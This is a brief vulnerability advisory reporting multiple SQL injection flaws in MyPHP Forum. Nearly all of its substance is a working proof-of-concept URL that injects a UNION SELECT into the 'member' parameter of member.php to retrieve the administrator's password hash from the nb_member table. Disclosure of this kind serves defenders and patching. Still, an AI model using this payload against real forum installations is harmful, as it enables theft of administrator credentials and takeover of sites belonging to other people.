MyPHP Forum Multiple SQL Injection Vulnerabilities

MyPHP Forum Multiple SQL Injection Vulnerabilities

No exploit is required and the following proof of concept is available for retrieving a hash of the administrator password:

http://www.example.com/[MyPHPForum]/member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1